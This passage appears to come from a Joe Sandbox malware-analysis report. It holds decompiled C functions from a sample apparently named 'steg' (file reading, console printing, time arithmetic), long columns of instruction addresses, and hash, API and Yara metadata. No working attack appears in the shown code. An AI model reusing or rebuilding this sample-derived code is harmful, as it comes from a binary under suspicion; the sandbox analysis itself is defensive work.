																			_t318 = _t318 + 0xc;
																			_v5816 = 1;
																		}
																		goto L25;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									goto L36;
								}
								_pop(_t302);
								goto L29;
							}
						} else {
							_push(_v5820);
							_t260 = E00FE9010(_t263, __edi, __esi, _t326);
							_pop(_t270);
							return E00FE72F2(_t260, _t270, _v8 ^ _t313, __edx, __edi, __esi);
						}
					}
				}
				L36:
			}



























































































































                                                                                                                    0x00f8c197
                                                                                                                    0x00f8c197
                                                                                                                    0x00f8c197
                                                                                                                    0x00f8c197
                                                                                                                    0x00f8c19f
                                                                                                                    0x00f8c1ab
                                                                                                                    0x00f8c1be
                                                                                                                    0x00f8c1c8
                                                                                                                    0x00f8c1d2
                                                                                                                    0x00f8c1dc
                                                                                                                    0x00f8c1e6
                                                                                                                    0x00f8c1ef
                                                                                                                    0x00f8c1f6
                                                                                                                    0x00f8c1fb
                                                                                                                    0x00f8c201
                                                                                                                    0x00f8c206
                                                                                                                    0x00f8c647
                                                                                                                    0x00f8c64a
                                                                                                                    0x00f8c654
                                                                                                                    0x00f8c20c
                                                                                                                    0x00f8c20c
                                                                                                                    0x00f8c20e
                                                                                                                    0x00000000
                                                                                                                    0x00f8c214
                                                                                                                    0x00f8c214
                                                                                                                    0x00f8c215
                                                                                                                    0x00f8c217
                                                                                                                    0x00f8c218
                                                                                                                    0x00f8c219
                                                                                                                    0x00f8c21e
                                                                                                                    0x00f8c224
                                                                                                                    0x00f8c229
                                                                                                                    0x00f8c22c
                                                                                                                    0x00f8c232
                                                                                                                    0x00f8c237
                                                                                                                    0x00f8c23a
                                                                                                                    0x00f8c240
                                                                                                                    0x00f8c242
                                                                                                                    0x00f8c261
                                                                                                                    0x00f8c262
                                                                                                                    0x00f8c268
                                                                                                                    0x00f8c276
                                                                                                                    0x00f8c27d
                                                                                                                    0x00f8c282
                                                                                                                    0x00f8c288
                                                                                                                    0x00f8c28d
                                                                                                                    0x00f8c293
                                                                                                                    0x00f8c296
                                                                                                                    0x00f8c298
                                                                                                                    0x00f8c29a
                                                                                                                    0x00f8c63c
                                                                                                                    0x00f8c63d
                                                                                                                    0x00f8c645
                                                                                                                    0x00f8c646
                                                                                                                    0x00000000
                                                                                                                    0x00f8c2a0
                                                                                                                    0x00f8c2a0
                                                                                                                    0x00f8c2a7
                                                                                                                    0x00f8c2b0
                                                                                                                    0x00f8c2b5
                                                                                                                    0x00f8c2b8
                                                                                                                    0x00f8c2ba
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f8c2c0
                                                                                                                    0x00f8c2c3
                                                                                                                    0x00f8c2c3
                                                                                                                    0x00f8c2c6
                                                                                                                    0x00f8c2c8
                                                                                                                    0x00f8c2ce
                                                                                                                    0x00f8c2ce
                                                                                                                    0x00f8c2d1
                                                                                                                    0x00f8c2d3
                                                                                                                    0x00f8c62d
                                                                                                                    0x00f8c62d
                                                                                                                    0x00f8c633
                                                                                                                    0x00f8c635
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f8c2d9
                                                                                                                    0x00f8c2e1
                                                                                                                    0x00f8c2e3
                                                                                                                    0x00000000
                                                                                                                    0x00f8c2e9
                                                                                                                    0x00f8c2fc
                                                                                                                    0x00f8c302
                                                                                                                    0x00f8c31d
                                                                                                                    0x00f8c323
                                                                                                                    0x00f8c331
                                                                                                                    0x00f8c336
                                                                                                                    0x00f8c338
                                                                                                                    0x00f8c627
                                                                                                                    0x00f8c627
                                                                                                                    0x00000000
                                                                                                                    0x00f8c33e
                                                                                                                    0x00f8c349
                                                                                                                    0x00f8c34b
                                                                                                                    0x00000000
                                                                                                                    0x00f8c351
                                                                                                                    0x00f8c351
                                                                                                                    0x00f8c354
                                                                                                                    0x00000000
                                                                                                                    0x00f8c35a
                                                                                                                    0x00f8c35a
                                                                                                                    0x00f8c35d
                                                                                                                    0x00000000
                                                                                                                    0x00f8c363
                                                                                                                    0x00f8c36a
                                                                                                                    0x00f8c372
                                                                                                                    0x00f8c378
                                                                                                                    0x00f8c385
                                                                                                                    0x00f8c38b
                                                                                                                    0x00f8c395
                                                                                                                    0x00f8c39e
                                                                                                                    0x00f8c3a4
                                                                                                                    0x00f8c3b3
                                                                                                                    0x00f8c3b8
                                                                                                                    0x00f8c3c4
                                                                                                                    0x00f8c3cc
                                                                                                                    0x00f8c3d1
                                                                                                                    0x00f8c3de
                                                                                                                    0x00f8c3e6
                                                                                                                    0x00f8c3ee
                                                                                                                    0x00f8c3f4
                                                                                                                    0x00f8c3fe
                                                                                                                    0x00f8c407
                                                                                                                    0x00f8c40d
                                                                                                                    0x00f8c41c
                                                                                                                    0x00f8c42c
                                                                                                                    0x00f8c43c
                                                                                                                    0x00f8c44c
                                                                                                                    0x00f8c454
                                                                                                                    0x00f8c45a
                                                                                                                    0x00f8c484
                                                                                                                    0x00f8c48b
                                                                                                                    0x00f8c490
                                                                                                                    0x00f8c496
                                                                                                                    0x00f8c499
                                                                                                                    0x00f8c49b
                                                                                                                    0x00f8c622
                                                                                                                    0x00f8c625
                                                                                                                    0x00f8c625
                                                                                                                    0x00000000
                                                                                                                    0x00f8c4a1
                                                                                                                    0x00f8c4a1
                                                                                                                    0x00f8c4a3
                                                                                                                    0x00000000
                                                                                                                    0x00f8c4a9
                                                                                                                    0x00f8c4bb
                                                                                                                    0x00f8c4bf
                                                                                                                    0x00f8c4c4
                                                                                                                    0x00f8c4ca
                                                                                                                    0x00f8c4cd
                                                                                                                    0x00f8c4d7
                                                                                                                    0x00f8c4d7
                                                                                                                    0x00f8c4da
                                                                                                                    0x00f8c4dd
                                                                                                                    0x00f8c4dd
                                                                                                                    0x00f8c4eb
                                                                                                                    0x00f8c4eb
                                                                                                                    0x00f8c502
                                                                                                                    0x00f8c508
                                                                                                                    0x00f8c50e
                                                                                                                    0x00f8c517
                                                                                                                    0x00f8c517
                                                                                                                    0x00f8c51a
                                                                                                                    0x00f8c51d
                                                                                                                    0x00f8c51d
                                                                                                                    0x00f8c524
                                                                                                                    0x00f8c526
                                                                                                                    0x00f8c52b
                                                                                                                    0x00f8c655
                                                                                                                    0x00f8c65b
                                                                                                                    0x00f8c65e
                                                                                                                    0x00f8c660
                                                                                                                    0x00f8c662
                                                                                                                    0x00f8c666
                                                                                                                    0x00f8c66c
                                                                                                                    0x00f8c66d
                                                                                                                    0x00f8c66e
                                                                                                                    0x00f8c66f
                                                                                                                    0x00f8c670
                                                                                                                    0x00f8c671
                                                                                                                    0x00f8c672
                                                                                                                    0x00f8c673
                                                                                                                    0x00f8c674
                                                                                                                    0x00f8c675
                                                                                                                    0x00f8c676
                                                                                                                    0x00f8c677
                                                                                                                    0x00f8c678
                                                                                                                    0x00f8c67f
                                                                                                                    0x00f8c68b
                                                                                                                    0x00f8c691
                                                                                                                    0x00f8c692
                                                                                                                    0x00f8c695
                                                                                                                    0x00f8c6a2
                                                                                                                    0x00f8c6ac
                                                                                                                    0x00f8c6b6
                                                                                                                    0x00f8c6c0
                                                                                                                    0x00f8c6ca
                                                                                                                    0x00f8c6d4
                                                                                                                    0x00f8c6db
                                                                                                                    0x00f8c6e2
                                                                                                                    0x00f8c6e9
                                                                                                                    0x00f8c6f0
                                                                                                                    0x00f8c6f7
                                                                                                                    0x00f8c6fe
                                                                                                                    0x00f8c705
                                                                                                                    0x00f8c70c
                                                                                                                    0x00f8c713
                                                                                                                    0x00f8c71a
                                                                                                                    0x00f8c721
                                                                                                                    0x00f8c728
                                                                                                                    0x00f8c72f
                                                                                                                    0x00f8c736
                                                                                                                    0x00f8c73d
                                                                                                                    0x00f8c744
                                                                                                                    0x00f8c74b
                                                                                                                    0x00f8c752
                                                                                                                    0x00f8c759
                                                                                                                    0x00f8c760
                                                                                                                    0x00f8c767
                                                                                                                    0x00f8c76e
                                                                                                                    0x00f8c775
                                                                                                                    0x00f8c77c
                                                                                                                    0x00f8c783
                                                                                                                    0x00f8c78a
                                                                                                                    0x00f8c791
                                                                                                                    0x00f8c798
                                                                                                                    0x00f8c79f
                                                                                                                    0x00f8c7a6
                                                                                                                    0x00f8c7ad
                                                                                                                    0x00f8c7b5
                                                                                                                    0x00f8c7b7
                                                                                                                    0x00f8c80e
                                                                                                                    0x00f8c810
                                                                                                                    0x00f8c814
                                                                                                                    0x00f8c81e
                                                                                                                    0x00f8c7b9
                                                                                                                    0x00f8c7b9
                                                                                                                    0x00f8c7c5
                                                                                                                    0x00f8c7ee
                                                                                                                    0x00f8c7f4
                                                                                                                    0x00f8c7fe
                                                                                                                    0x00f8c804
                                                                                                                    0x00f8c806
                                                                                                                    0x00f8c826
                                                                                                                    0x00f8c82f
                                                                                                                    0x00f8c83a
                                                                                                                    0x00f8c83e
                                                                                                                    0x00f8c83f
                                                                                                                    0x00f8c846
                                                                                                                    0x00f8c84f
                                                                                                                    0x00f8c808
                                                                                                                    0x00f8c808
                                                                                                                    0x00000000
                                                                                                                    0x00f8c808
                                                                                                                    0x00f8c806
                                                                                                                    0x00f8c531
                                                                                                                    0x00f8c533
                                                                                                                    0x00f8c546
                                                                                                                    0x00f8c54b
                                                                                                                    0x00f8c54e
                                                                                                                    0x00f8c550
                                                                                                                    0x00f8c582
                                                                                                                    0x00f8c583
                                                                                                                    0x00f8c586
                                                                                                                    0x00f8c58c
                                                                                                                    0x00f8c58c
                                                                                                                    0x00f8c618
                                                                                                                    0x00f8c552
                                                                                                                    0x00f8c565
                                                                                                                    0x00f8c56a
                                                                                                                    0x00f8c56d
                                                                                                                    0x00f8c56d
                                                                                                                    0x00000000
                                                                                                                    0x00f8c550
                                                                                                                    0x00f8c52b
                                                                                                                    0x00f8c4a3
                                                                                                                    0x00f8c49b
                                                                                                                    0x00f8c35d
                                                                                                                    0x00f8c354
                                                                                                                    0x00f8c34b
                                                                                                                    0x00f8c338
                                                                                                                    0x00f8c2e3
                                                                                                                    0x00000000
                                                                                                                    0x00f8c2d3
                                                                                                                    0x00f8c63b
                                                                                                                    0x00000000
                                                                                                                    0x00f8c63b
                                                                                                                    0x00f8c244
                                                                                                                    0x00f8c244
                                                                                                                    0x00f8c24a
                                                                                                                    0x00f8c252
                                                                                                                    0x00f8c260
                                                                                                                    0x00f8c260
                                                                                                                    0x00f8c242
                                                                                                                    0x00f8c20e
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • __wfopen_s.LIBCMT ref: 00F8C1F6
                                                                                                                    • _fseek.LIBCMT ref: 00F8C219
                                                                                                                    • _malloc.LIBCMT ref: 00F8C232
                                                                                                                      • Part of subcall function 00FE7BCE: __FF_MSGBANNER.LIBCMT ref: 00FE7BE5
                                                                                                                      • Part of subcall function 00FE7BCE: __NMSG_WRITE.LIBCMT ref: 00FE7BEC
                                                                                                                    • __fread_nolock.LIBCMT ref: 00F8C27D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: __fread_nolock__wfopen_s_fseek_malloc
                                                                                                                    • String ID: H}>$I$appl$com.$e.Sa$fari
                                                                                                                    • API String ID: 375348327-3462864509
                                                                                                                    • Opcode ID: 1a873c5dce213d705d04b015f7dcf2c0fe33bfaeac4afa8ac49061306c789284
                                                                                                                    • Instruction ID: 91e0fcb5d9709f2a414425c2bb60cf9f418c011d526becea49a2bce8c30a13f7
                                                                                                                    • Opcode Fuzzy Hash: 1a873c5dce213d705d04b015f7dcf2c0fe33bfaeac4afa8ac49061306c789284
                                                                                                                    • Instruction Fuzzy Hash: 32F18EB5D042589EDF20DFA5CC81BDDBBB8EF08300F0441EAE559AB241E7759A84DFA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00F8F0B7 Relevance: 19.6, APIs: 13, Instructions: 87COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 47%
                                                                                                                    			E00F8F0B7() {
				signed int _v8;
				signed short _v24;
				char _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t14;
				void* _t17;
				void* _t28;
				intOrPtr* _t31;
				void* _t35;
				signed int _t36;
				intOrPtr* _t38;
				signed int _t39;

				_v8 =  *0x481f80 ^ _t39;
				_t31 =  *0x470104;
				_t7 =  *_t31(0xfffffff5);
				_t8 =  *0x47004c(_t7,  &_v32);
				_t36 = _v24 & 0x0000ffff;
				_t44 = _t8;
				if(_t8 == 0) {
					_t36 = 0xf;
				}
				_t9 =  *_t31(0xfffffff5);
				_t38 =  *0x470050;
				 *_t38(_t9, 0xf);
				E00FE9C53(_t31, _t36, _t38, _t44);
				E00FE9C53(_t31, _t36, _t38, _t44);
				E00FE9C53(_t31, _t36, _t38, _t44);
				_t14 =  *_t31(0xfffffff5, 0x4703d0, 0x470398, 0x470378, 0x470360, 0x47035c, 0x470318);
				 *_t38(_t14, 0xf);
				E00FE9C53(_t31, _t36, _t38, _t44);
				_t17 =  *_t31(0xfffffff5, 0x470318);
				 *_t38(_t17, 0xa);
				E00FE9C53(_t31, _t36, _t38, _t44);
				E00FE9C53(_t31, _t36, _t38, _t44);
				E00FE9C53(_t31, _t36, _t38, _t44);
				E00FE9C53(_t31, _t36, _t38, _t44);
				E00FE9C53(_t31, _t36, _t38, _t44);
				E00FE9C53(_t31, _t36, _t38, _t44);
				E00FE9C53(_t31, _t36, _t38, _t44);
				E00FE9C53(_t31, _t36, _t38, _t44);
				E00FE9C53(_t31, _t36, _t38, _t44);
				_t28 =  *_t31(0xfffffff5, 0x47051c, 0x47050c, 0x4703dc, 0x4704f0, 0x4704d0, 0x4703dc, 0x470480, 0x470470, 0x4703dc, 0x470434, 0x470424, 0x4703f0, 0x4703dc);
				return E00FE72F2( *_t38(_t36 | 0x00000008), _t31, _v8 ^ _t39, _t35, _t36 | 0x00000008, _t38, _t28);
			}





















                                                                                                                    0x00f8f0c4
                                                                                                                    0x00f8f0c8
                                                                                                                    0x00f8f0d2
                                                                                                                    0x00f8f0d9
                                                                                                                    0x00f8f0df
                                                                                                                    0x00f8f0e3
                                                                                                                    0x00f8f0e5
                                                                                                                    0x00f8f0e7
                                                                                                                    0x00f8f0e7
                                                                                                                    0x00f8f0ee
                                                                                                                    0x00f8f0f0
                                                                                                                    0x00f8f0f9
                                                                                                                    0x00f8f100
                                                                                                                    0x00f8f114
                                                                                                                    0x00f8f123
                                                                                                                    0x00f8f12d
                                                                                                                    0x00f8f132
                                                                                                                    0x00f8f139
                                                                                                                    0x00f8f143
                                                                                                                    0x00f8f148
                                                                                                                    0x00f8f154
                                                                                                                    0x00f8f15e
                                                                                                                    0x00f8f168
                                                                                                                    0x00f8f177
                                                                                                                    0x00f8f181
                                                                                                                    0x00f8f190
                                                                                                                    0x00f8f19a
                                                                                                                    0x00f8f1a9
                                                                                                                    0x00f8f1b3
                                                                                                                    0x00f8f1bd
                                                                                                                    0x00f8f1d6

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _wprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2738768116-0
                                                                                                                    • Opcode ID: 5c9291e5854e53c87d8811a1cd8e349ed07527149dd1dd5fd2e6ad2ec99ad9bd
                                                                                                                    • Instruction ID: 1dc27fb651fc5d1e474f94231480b8cd6e314fea62d3a6c13813afb0b3d84e5a
                                                                                                                    • Opcode Fuzzy Hash: 5c9291e5854e53c87d8811a1cd8e349ed07527149dd1dd5fd2e6ad2ec99ad9bd
                                                                                                                    • Instruction Fuzzy Hash: EA219F51B86786F6861077BAAD07FDE3A889B40B28F30C227BE1CB20C298EC5501557E
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00FEAC3B Relevance: 16.8, APIs: 11, Instructions: 261COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 76%
                                                                                                                    			E00FEAC3B(signed int __edx, signed int _a4, signed int _a8) {
				char _v8;
				char _v12;
				char _v16;
				signed int _v20;
				char _v24;
				signed int _v40;
				signed int _v44;
				unsigned int _v48;
				signed int _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t100;
				signed int _t102;
				void* _t103;
				signed int _t106;
				signed int _t109;
				signed int _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				signed int _t116;
				signed int _t117;
				signed int _t118;
				signed int _t127;
				signed int _t129;
				signed int _t131;
				signed int _t136;
				signed int _t142;
				signed int _t148;
				signed int* _t151;
				signed int _t155;
				signed int _t159;
				void* _t161;
				signed int _t162;
				signed int _t163;
				signed int _t166;
				void* _t171;
				signed int _t174;
				signed int _t183;
				unsigned int _t184;
				signed int _t188;
				signed int* _t201;
				signed int _t203;
				signed int _t207;
				signed int _t208;
				signed int _t210;
				signed int _t212;
				void* _t214;
				void* _t216;
				signed int _t217;
				signed int _t218;

				_t183 = __edx;
				_t201 = _a4;
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				if(_t201 != 0) {
					E00FE7C87(_t201, 0xff, 0x24);
					_t207 = _a8;
					__eflags = _t207;
					if(_t207 == 0) {
						goto L1;
					} else {
						__eflags =  *(_t207 + 4);
						if(__eflags > 0) {
							L9:
							_t103 = 7;
							__eflags =  *(_t207 + 4) - _t103;
							if(__eflags < 0) {
								L12:
								E00FF28A4(0, _t183, _t201, _t207, __eflags);
								_t106 = E00FF25FD( &_v12);
								__eflags = _t106;
								if(_t106 != 0) {
									L45:
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									E00FEC6A6(_t106, 0, _t183);
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									_push(_t201);
									_push(_t207);
									_push(0);
									_t203 = 0;
									_t109 = _v48;
									__eflags = _t109;
									if(_t109 < 0) {
										_t203 = 1;
										__eflags = 1;
										asm("sbb eax, 0x0");
										_v48 =  ~_t109;
										_v52 =  ~_v52;
									}
									_t111 = _v40;
									__eflags = _t111;
									if(_t111 < 0) {
										_t203 = _t203 + 1;
										__eflags = _t203;
										_t111 =  ~_t111;
										asm("sbb eax, 0x0");
										_v40 = _t111;
										_v44 =  ~_v44;
									}
									_t112 = _t111;
									__eflags = _t112;
									if(_t112 != 0) {
										_t155 = _t112;
										_t166 = _v44;
										_t184 = _v48;
										_t113 = _v52;
										do {
											asm("rcr ecx, 1");
											_t184 = _t184 >> 1;
											asm("rcr eax, 1");
											_t155 = _t155 >> 1;
											__eflags = _t155;
										} while (_t155 != 0);
										_t114 = _t113 / _t166;
										_t210 = _t114;
										_t116 = _v44;
										_t117 = _t116 * _t210;
										_t188 = (_t116 * _t210 >> 0x20) + _t114 * _v40;
										__eflags = _t188;
										if(_t188 < 0) {
											L58:
											_t210 = _t210 - 1;
											__eflags = _t210;
										} else {
											__eflags = _t188 - _v48;
											if(__eflags > 0) {
												goto L58;
											} else {
												if(__eflags >= 0) {
													__eflags = _t117 - _v52;
													if(_t117 > _v52) {
														goto L58;
													}
												}
											}
										}
										__eflags = 0;
										_t118 = _t210;
									} else {
										_t118 = _v52 / _v44;
									}
									__eflags = _t203 == 1;
									if(_t203 == 1) {
										_t118 =  ~_t118;
										asm("sbb edx, 0x0");
									}
									return _t118;
								} else {
									_t106 = E00FF2627( &_v16);
									__eflags = _t106;
									if(_t106 != 0) {
										goto L45;
									} else {
										_t106 = E00FF2651( &_v8);
										__eflags = _t106;
										if(_t106 != 0) {
											goto L45;
										} else {
											_t159 =  *(_t207 + 4);
											_t171 =  *_t207;
											__eflags = _t159;
											if(__eflags < 0) {
												L23:
												_t102 = E00FF267B(_t201, _t207);
												__eflags = _t102;
												if(_t102 == 0) {
													__eflags = _v12 - _t102;
													if(__eflags == 0) {
														L27:
														asm("cdq");
														_t212 = _t183;
														asm("cdq");
														_t161 =  *_t201 - _v8;
														asm("sbb esi, edx");
													} else {
														_push(_t201);
														_t142 = E00FF28F4(_t159, _t201, _t207, __eflags);
														__eflags = _t142;
														if(_t142 == 0) {
															goto L27;
														} else {
															_t201[8] = 1;
															asm("cdq");
															asm("cdq");
															_t161 =  *_t201 - _v16 + _v8;
															asm("sbb edx, esi");
															_a4 = _t183;
															_t212 = _t183;
														}
													}
													_t127 = E00FEB087(_t161, _t212, 0x3c, 0);
													 *_t201 = _t127;
													__eflags = _t127;
													if(_t127 < 0) {
														_t127 = _t127 + 0x3c;
														_t161 = _t161 + 0xffffffc4;
														 *_t201 = _t127;
														asm("adc esi, 0xffffffff");
													}
													_push(0);
													_push(0x3c);
													_push(_t212);
													_push(_t161);
													L46();
													_t162 = _t183;
													asm("cdq");
													_t214 = _t127 + _t201[1];
													asm("adc ebx, edx");
													_t129 = E00FEB087(_t214, _t162, 0x3c, 0);
													_t201[1] = _t129;
													__eflags = _t129;
													if(_t129 < 0) {
														_t129 = _t129 + 0x3c;
														_t214 = _t214 + 0xffffffc4;
														_t201[1] = _t129;
														asm("adc ebx, 0xffffffff");
													}
													_push(0);
													_push(0x3c);
													_push(_t162);
													_push(_t214);
													L46();
													_t163 = _t183;
													asm("cdq");
													_t216 = _t129 + _t201[2];
													asm("adc ebx, edx");
													_t131 = E00FEB087(_t216, _t163, 0x18, 0);
													_t201[2] = _t131;
													__eflags = _t131;
													if(_t131 < 0) {
														_t131 = _t131 + 0x18;
														_t216 = _t216 + 0xffffffe8;
														_t201[2] = _t131;
														asm("adc ebx, 0xffffffff");
													}
													_push(0);
													_push(0x18);
													_push(_t163);
													_push(_t216);
													L46();
													_t174 = _t131;
													__eflags = _t183;
													if(__eflags < 0) {
														L43:
														asm("cdq");
														_t217 = 7;
														_t201[3] = _t201[3] + _t174;
														_t136 = _t201[3];
														_t201[6] = (_t201[6] + 7 + _t174) % _t217;
														__eflags = _t136;
														if(_t136 > 0) {
															goto L38;
														} else {
															_t201[3] = _t136 + 0x1f;
															_t54 = _t174 + 0x16d; // 0x16d
															_t201[7] = _t201[7] + _t54;
															_t201[5] = _t201[5] - 1;
															_t201[4] = 0xb;
														}
													} else {
														if(__eflags > 0) {
															L37:
															asm("cdq");
															_t218 = 7;
															_t39 =  &(_t201[3]);
															 *_t39 = _t201[3] + _t174;
															__eflags =  *_t39;
															_t201[6] = (_t201[6] + _t174) % _t218;
															L38:
															_t42 =  &(_t201[7]);
															 *_t42 = _t201[7] + _t174;
															__eflags =  *_t42;
														} else {
															__eflags = _t174;
															if(_t174 == 0) {
																__eflags = _t183;
																if(__eflags <= 0) {
																	if(__eflags < 0) {
																		goto L43;
																	} else {
																		__eflags = _t174;
																		if(_t174 < 0) {
																			goto L43;
																		}
																	}
																}
															} else {
																goto L37;
															}
														}
													}
													goto L39;
												}
											} else {
												if(__eflags > 0) {
													L18:
													asm("cdq");
													asm("sbb ebx, edx");
													_v24 = _t171 - _v8;
													_v20 = _t159;
													_t102 = E00FF267B(_t201,  &_v24);
													__eflags = _t102;
													if(_t102 == 0) {
														__eflags = _v12 - _t102;
														if(__eflags == 0) {
															L39:
															_t102 = 0;
														} else {
															_push(_t201);
															_t148 = E00FF28F4(_t159, _t201, _t207, __eflags);
															__eflags = _t148;
															if(_t148 == 0) {
																goto L39;
															} else {
																asm("cdq");
																_v24 = _v24 - _v16;
																asm("sbb [ebp-0x10], edx");
																_t102 = E00FF267B(_t201,  &_v24);
																__eflags = _t102;
																if(_t102 == 0) {
																	_t201[8] = 1;
																	goto L39;
																}
															}
														}
													}
												} else {
													__eflags = _t171 - 0x3f480;
													if(_t171 <= 0x3f480) {
														goto L23;
													} else {
														goto L18;
													}
												}
											}
											goto L3;
										}
									}
								}
							} else {
								if(__eflags > 0) {
									goto L8;
								} else {
									__eflags =  *_t207 - 0x93406fff;
									if(__eflags > 0) {
										goto L8;
									} else {
										goto L12;
									}
								}
							}
						} else {
							if(__eflags < 0) {
								L8:
								_t151 = E00FEC705();
								_t208 = 0x16;
								 *_t151 = _t208;
								goto L2;
							} else {
								__eflags =  *_t207;
								if( *_t207 >= 0) {
									goto L9;
								} else {
									goto L8;
								}
							}
						}
					}
				} else {
					L1:
					_t100 = E00FEC705();
					_t208 = 0x16;
					 *_t100 = _t208;
					E00FEC696();
					L2:
					_t102 = _t208;
					L3:
					return _t102;
				}
			}























































                                                                                                                    0x00feac3b
                                                                                                                    0x00feac46
                                                                                                                    0x00feac49
                                                                                                                    0x00feac4c
                                                                                                                    0x00feac4f
                                                                                                                    0x00feac54
                                                                                                                    0x00feac74
                                                                                                                    0x00feac79
                                                                                                                    0x00feac7f
                                                                                                                    0x00feac81
                                                                                                                    0x00000000
                                                                                                                    0x00feac83
                                                                                                                    0x00feac83
                                                                                                                    0x00feac86
                                                                                                                    0x00feac9a
                                                                                                                    0x00feac9c
                                                                                                                    0x00feac9d
                                                                                                                    0x00feaca0
                                                                                                                    0x00feacac
                                                                                                                    0x00feacac
                                                                                                                    0x00feacb5
                                                                                                                    0x00feacbb
                                                                                                                    0x00feacbd
                                                                                                                    0x00feaea8
                                                                                                                    0x00feaea8
                                                                                                                    0x00feaea9
                                                                                                                    0x00feaeaa
                                                                                                                    0x00feaeab
                                                                                                                    0x00feaeac
                                                                                                                    0x00feaead
                                                                                                                    0x00feaeb2
                                                                                                                    0x00feaeb3
                                                                                                                    0x00feaeb4
                                                                                                                    0x00feaeb5
                                                                                                                    0x00feaeb6
                                                                                                                    0x00feaeb7
                                                                                                                    0x00feaeb8
                                                                                                                    0x00feaeb9
                                                                                                                    0x00feaeba
                                                                                                                    0x00feaec0
                                                                                                                    0x00feaec0
                                                                                                                    0x00feaec2
                                                                                                                    0x00feaec4
                                                                                                                    0x00feaec4
                                                                                                                    0x00feaecd
                                                                                                                    0x00feaed0
                                                                                                                    0x00feaed4
                                                                                                                    0x00feaed4
                                                                                                                    0x00feaedc
                                                                                                                    0x00feaedc
                                                                                                                    0x00feaede
                                                                                                                    0x00feaee0
                                                                                                                    0x00feaee0
                                                                                                                    0x00feaee5
                                                                                                                    0x00feaee9
                                                                                                                    0x00feaeec
                                                                                                                    0x00feaef0
                                                                                                                    0x00feaef0
                                                                                                                    0x00feaef4
                                                                                                                    0x00feaef4
                                                                                                                    0x00feaef6
                                                                                                                    0x00feaf10
                                                                                                                    0x00feaf12
                                                                                                                    0x00feaf16
                                                                                                                    0x00feaf1a
                                                                                                                    0x00feaf1e
                                                                                                                    0x00feaf20
                                                                                                                    0x00feaf22
                                                                                                                    0x00feaf24
                                                                                                                    0x00feaf26
                                                                                                                    0x00feaf26
                                                                                                                    0x00feaf26
                                                                                                                    0x00feaf2a
                                                                                                                    0x00feaf2c
                                                                                                                    0x00feaf34
                                                                                                                    0x00feaf38
                                                                                                                    0x00feaf3a
                                                                                                                    0x00feaf3a
                                                                                                                    0x00feaf3c
                                                                                                                    0x00feaf4c
                                                                                                                    0x00feaf4c
                                                                                                                    0x00feaf4c
                                                                                                                    0x00feaf3e
                                                                                                                    0x00feaf3e
                                                                                                                    0x00feaf42
                                                                                                                    0x00000000
                                                                                                                    0x00feaf44
                                                                                                                    0x00feaf44
                                                                                                                    0x00feaf46
                                                                                                                    0x00feaf4a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00feaf4a
                                                                                                                    0x00feaf44
                                                                                                                    0x00feaf42
                                                                                                                    0x00feaf4d
                                                                                                                    0x00feaf4f
                                                                                                                    0x00feaef8
                                                                                                                    0x00feaf0a
                                                                                                                    0x00feaf0c
                                                                                                                    0x00feaf51
                                                                                                                    0x00feaf52
                                                                                                                    0x00feaf56
                                                                                                                    0x00feaf58
                                                                                                                    0x00feaf58
                                                                                                                    0x00feaf5e
                                                                                                                    0x00feacc3
                                                                                                                    0x00feacc7
                                                                                                                    0x00feaccd
                                                                                                                    0x00feaccf
                                                                                                                    0x00000000
                                                                                                                    0x00feacd5
                                                                                                                    0x00feacd9
                                                                                                                    0x00feacdf
                                                                                                                    0x00feace1
                                                                                                                    0x00000000
                                                                                                                    0x00feace7
                                                                                                                    0x00feace7
                                                                                                                    0x00feacea
                                                                                                                    0x00feacec
                                                                                                                    0x00feacee
                                                                                                                    0x00fead5e
                                                                                                                    0x00fead60
                                                                                                                    0x00fead67
                                                                                                                    0x00fead69
                                                                                                                    0x00fead6f
                                                                                                                    0x00fead72
                                                                                                                    0x00feada1
                                                                                                                    0x00feada3
                                                                                                                    0x00feada9
                                                                                                                    0x00feadab
                                                                                                                    0x00feadac
                                                                                                                    0x00feadae
                                                                                                                    0x00fead74
                                                                                                                    0x00fead74
                                                                                                                    0x00fead75
                                                                                                                    0x00fead7b
                                                                                                                    0x00fead7d
                                                                                                                    0x00000000
                                                                                                                    0x00fead7f
                                                                                                                    0x00fead85
                                                                                                                    0x00fead8c
                                                                                                                    0x00fead93
                                                                                                                    0x00fead96
                                                                                                                    0x00fead98
                                                                                                                    0x00fead9a
                                                                                                                    0x00fead9d
                                                                                                                    0x00fead9d
